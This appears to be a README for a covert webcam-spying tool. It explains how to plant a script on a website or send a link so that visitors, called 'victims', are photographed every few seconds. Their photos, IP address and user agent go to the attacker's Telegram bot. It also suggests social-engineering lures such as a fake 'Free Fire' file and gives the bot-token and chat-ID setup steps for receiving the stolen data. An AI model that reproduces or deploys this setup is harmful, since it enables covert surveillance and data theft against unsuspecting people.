Cam shots from target's phone front camera or PC webcam just sending a link, or add the script to your website or any webpage without port forwarding and web server and complexities of command prompt codes.
You can just add a script.js file to your site and watch. When the Victim enters the site, he will be asked to access the camera and take pictures every 6 seconds, for example. Then all the data, including the IP address, user Agent, and pictures, will be sent to your bot on telegram easily. Or u can just upload a Free Fire file and use social engineering to hunt.
- Receive all informatin and photo on the telegram bot.
- Easy to use
- Get user Agent
- Get IP address
- Get shots photo from phone or PC
- Run Without port forwarding and web server
- telegram
- website or any Paid or free hosting like blogger , wordpress, github page etc.
find Bot Father on Telegram by search on search bar or use this link : @BotFather
start bot Father and send /newbot, choose name and username for your bot. after creating bot on bot Father you will receive your bot link and token, copy your bot token then click your bot link and start your bot.
So here is our bot token 63xxxxxx71:AAFoxxxxn0hwA-2TVSxxxNf4c
(make sure we don't share it to anyone).
- Search and open our new Telegram bot
- After well are Click Start or send a message
- Open this URL in a browser{our_bot_token}/getUpdates
- See we need to prefix our token with a wor
- Eg:
- See we need to prefix our token with a wor
- We will see a json like so
{ "ok": true, "result": [ { "update_id": 83xxxxx35, "message": { "message_id": 2643, "from": {...}, "chat": { "id": 21xxxxx38, "first_name": "...", "last_name": "...", "username": "@username", "type": "private" }, "date": 1703062972, "text": "/start" } } ] }
- Check the value of
, and here is our Chat ID:21xxxxx38
- Let's try to send a message:
- When we set the bot token and chat id correctly, the message
should be arrived on our Telegram bot chat.
Now replace the BOT_TOKEN and CHAT_ID keys with you own keys
const BOT_TOKEN = '00000000:XXXXXXXXXX-XXXXXXXXXXXXXXX_XXXX'; // Replace with your bot's TOKEN
const CHAT_ID = '1234567899'; // Replace with your bot's chat ID